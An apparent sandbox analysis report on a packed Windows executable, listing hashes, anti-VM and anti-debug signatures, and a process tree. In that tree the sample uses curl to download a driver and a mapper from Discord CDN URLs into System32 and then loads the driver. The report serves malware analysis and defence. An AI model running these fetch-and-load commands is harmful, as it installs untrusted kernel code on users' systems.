Analysis
- max time kernel: 30s
- max time network: 36s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26-03-2023 08:51
Behavioral tasks
- behavioral1: sample YS_External_V2.exe, resource win7-20230220-en
- behavioral2: sample YS_External_V2.exe, resource win10v2004-20230220-en
General
- Target: YS_External_V2.exe
- Size: 23.5MB
- MD5: 49bd07fcd35833d498db74a30e8da0c4
- SHA1: 695998aa01dcb54bbb8f3432d3eca4e39e84ee9b
- SHA256: 863ef4a6cc53d9ba762c43b053c60ff854ed5bb2a635d49ffa166569e8a8996c
- SHA512: 752ef105d0cc9196278f6fc9dbe40c6a940ae5543fc03962cfaa45c6e0e7183c6cfb7950d823131b01e6928214b408602bf888fcac531c7f8ed99ebeb07a21fa
- SSDEEP: 393216:nsL9KDKh8hHNQu6UDB5w0Lp/juLBqyBRhfvSOMQ0569yjRZ:nsLMDxy5cgqxjuwyBjAjo9k
Malware Config
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  Processes: YS_External_V2.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | YS_External_V2.exe
- Downloads MZ/PE file
- Sets service image path in registry (2 TTPs, 1 IoC)
  Processes: yamsmapper.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" | yamsmapper.exe
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes: YS_External_V2.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | YS_External_V2.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | YS_External_V2.exe
- Executes dropped EXE (1 IoC)
  Processes: yamsmapper.exe
  pid | process
  4340 | yamsmapper.exe
- Themida packer (YARA rule: themida) (6 IoCs)
  resource | yara_rule
  behavioral2/memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
  behavioral2/memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
  behavioral2/memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
  behavioral2/memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
  behavioral2/memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
  behavioral2/memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp | themida
- Checks whether UAC is enabled (1 IoC)
  Processes: YS_External_V2.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | YS_External_V2.exe
- Drops file in System32 directory (2 IoCs)
  Processes: curl.exe, curl.exe
  description | ioc | process
  File created | C:\Windows\System32\yamsud.sys | curl.exe
  File created | C:\Windows\System32\yamsmapper.exe | curl.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes: YS_External_V2.exe
  pid | process
  1292 | YS_External_V2.exe
- Suspicious behavior: LoadsDriver (1 IoC)
  Processes: yamsmapper.exe
  pid | process
  4340 | yamsmapper.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: yamsmapper.exe
  description | pid | process
  Token: SeLoadDriverPrivilege | 4340 | yamsmapper.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes: YS_External_V2.exe, cmd.exe, cmd.exe, cmd.exe
  description | pid | process | target process
  PID 1292 wrote to memory of 1676 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 1676 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 4456 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 4456 | 1292 | YS_External_V2.exe | cmd.exe
  PID 4456 wrote to memory of 220 | 4456 | cmd.exe | curl.exe
  PID 4456 wrote to memory of 220 | 4456 | cmd.exe | curl.exe
  PID 1292 wrote to memory of 4408 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 4408 | 1292 | YS_External_V2.exe | cmd.exe
  PID 4408 wrote to memory of 4060 | 4408 | cmd.exe | curl.exe
  PID 4408 wrote to memory of 4060 | 4408 | cmd.exe | curl.exe
  PID 1292 wrote to memory of 2064 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 2064 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 1492 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 1492 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1492 wrote to memory of 4340 | 1492 | cmd.exe | yamsmapper.exe
  PID 1492 wrote to memory of 4340 | 1492 | cmd.exe | yamsmapper.exe
  PID 1292 wrote to memory of 4320 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 4320 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 1652 | 1292 | YS_External_V2.exe | cmd.exe
  PID 1292 wrote to memory of 1652 | 1292 | YS_External_V2.exe | cmd.exe
Processes (tree; indentation gives the depth shown in the report)
- C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"
  signatures:
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
    signatures:
      - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe
      command line: curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
      signatures:
        - Drops file in System32 directory
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
    signatures:
      - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe
      command line: curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
      signatures:
        - Drops file in System32 directory
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
    signatures:
      - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\yamsmapper.exe
      command line: C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
      signatures:
        - Sets service image path in registry
        - Executes dropped EXE
        - Suspicious behavior: LoadsDriver
        - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c cls
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c pause >nul 2>&1
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\System32\yamsmapper.exe
  Filesize: 153KB
  MD5: 666d7f4bb7cf64772755b9a184486525
  SHA1: a645d988ff67e72aac11cc9560dbf89a8320aef0
  SHA256: a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
  SHA512: 3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
- C:\Windows\System32\yamsud.sys
  Filesize: 12KB
  MD5: 141ecbccc4bfbf03b8768232d5c6a273
  SHA1: 0e0c0340b8bccfd6aa352e80739c882e4bbe5404
  SHA256: 2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122
  SHA512: aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7
- memory/1292-133-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB
- memory/1292-134-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB
- memory/1292-135-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB
- memory/1292-136-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB
- memory/1292-137-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB
- memory/1292-145-0x00007FF7379D0000-0x00007FF739EBB000-memory.dmp
  Filesize: 36.9MB